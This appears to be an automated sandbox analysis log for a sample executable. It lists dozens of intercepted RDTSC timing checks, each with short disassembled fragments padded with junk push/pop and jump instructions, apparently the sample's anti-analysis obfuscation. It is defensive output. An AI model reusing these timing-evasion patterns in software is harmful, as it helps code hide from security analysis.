Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DEEB8 second address: 14DEEC4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF108C7BF06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DEEC4 second address: 14DEEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108873982h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DEEDC second address: 14DEEE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DEEE0 second address: 14DEEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E320C second address: 14E3210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2C64 second address: 14E2C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2C68 second address: 14E2CAD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007FF108C7BF06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF108C7BF18h 0x00000011 push esi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 push edi 0x00000018 jmp 00007FF108C7BF14h 0x0000001d pop edi 0x0000001e popad 0x0000001f pushad 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2CAD second address: 14E2CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2CB3 second address: 14E2CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 jng 00007FF108C7BF06h 0x0000000c pop ecx 0x0000000d jng 00007FF108C7BF0Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2CC8 second address: 14E2CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2CD2 second address: 14E2CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E2F7D second address: 14E2F86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E5609 second address: 14E560D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E560D second address: 14E5611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E5611 second address: 14E561D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF108C7BF06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E561D second address: 14E5623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E5623 second address: 14E5627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EAEAF second address: 14EAECC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873983h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EAECC second address: 14EAED6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF108C7BF06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E97D0 second address: 14E97DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14E97DE second address: 14E980E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF108C7BF06h 0x00000008 jc 00007FF108C7BF06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnl 00007FF108C7BF20h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EABEA second address: 14EABF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EDE83 second address: 14EDE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EDFBE second address: 14EDFCB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF108873976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EDFCB second address: 14EDFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EDFD1 second address: 14EDFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EDFD7 second address: 14EDFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EDFDC second address: 14EE002 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FF10887397Dh 0x00000008 jmp 00007FF10887397Dh 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FF108873976h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE1A4 second address: 14EE1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF108C7BF18h 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE1C6 second address: 14EE1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF10887397Eh 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE34D second address: 14EE352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE352 second address: 14EE368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Fh 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE64C second address: 14EE668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF14h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE668 second address: 14EE66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14EE66C second address: 14EE670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F4208 second address: 14F423C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108873980h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b js 00007FF108873984h 0x00000011 jmp 00007FF10887397Ch 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jc 00007FF108873976h 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F4E86 second address: 14F4E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F4E8A second address: 14F4E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F5162 second address: 14F5178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF12h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F5178 second address: 14F5184 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF108873976h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F54A1 second address: 14F54A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F54A9 second address: 14F54AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F54AF second address: 14F54B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F54B3 second address: 14F54D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FF108873980h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jne 00007FF108873976h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14F54D5 second address: 14F54DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FB68C second address: 14FB699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF108873976h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FB699 second address: 14FB6A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FB6A5 second address: 14FB6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FB6A9 second address: 14FB6C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FCDDD second address: 14FCDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FCDE3 second address: 14FCE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FF108C7BF14h 0x0000000b jmp 00007FF108C7BF0Eh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007FF108C7BF0Fh 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b pop edx 0x0000001c jmp 00007FF108C7BF0Bh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500A67 second address: 1500A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 ja 00007FF108873976h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500A76 second address: 1500A7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500A7B second address: 1500A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500A81 second address: 1500A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FFD49 second address: 14FFD4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14FFE9B second address: 14FFED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF11h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FF108C7BF15h 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF108C7BF0Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500366 second address: 1500375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FF10887397Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500375 second address: 150037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 150037B second address: 150037F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 150049A second address: 15004A4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF108C7BF06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 15004A4 second address: 15004B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FF108873976h 0x0000000d jne 00007FF108873976h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1500785 second address: 15007D0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF108C7BF06h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007FF108C7BF14h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 jmp 00007FF108C7BF18h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 popad 0x00000021 push edi 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 pop edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1501F91 second address: 1501F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1501F95 second address: 1501F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1501F99 second address: 1501F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1509384 second address: 15093A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FF108C7BF2Eh 0x0000000f jbe 00007FF108C7BF20h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 150AF30 second address: 150AF4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873984h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 151064B second address: 1510654 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 151C8AC second address: 151C8CD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FF108873976h 0x0000000f jmp 00007FF108873981h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 151C8CD second address: 151C8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FF108C7BF06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 151C8D7 second address: 151C8FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF108873988h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 151C8FC second address: 151C900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 151F9B2 second address: 151F9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 151F9B7 second address: 151F9D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF19h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 151F562 second address: 151F57E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873987h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1529713 second address: 152972C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF13h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 152972C second address: 1529730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 153059B second address: 153059F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 153059F second address: 15305A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 15305A5 second address: 15305B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF108C7BF0Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1533727 second address: 153372D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1538E56 second address: 1538E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 15399F5 second address: 15399FF instructions: 0x00000000 rdtsc 0x00000002 js 00007FF108873976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 153C070 second address: 153C074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 153C074 second address: 153C083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 ja 00007FF108873976h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 153C083 second address: 153C099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FF108C7BF0Ch 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 153C099 second address: 153C09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 153C09F second address: 153C0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jnl 00007FF108C7BF06h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 153C0B7 second address: 153C0D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108873983h 0x00000009 jno 00007FF108873976h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 153C0D4 second address: 153C0D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 153E793 second address: 153E7BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FF108873976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF108873989h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 157BE6B second address: 157BE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1455DA9 second address: 1455DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1455DAD second address: 1455DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 158DCC5 second address: 158DCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 158DCCB second address: 158DCD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 158F8A3 second address: 158F8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
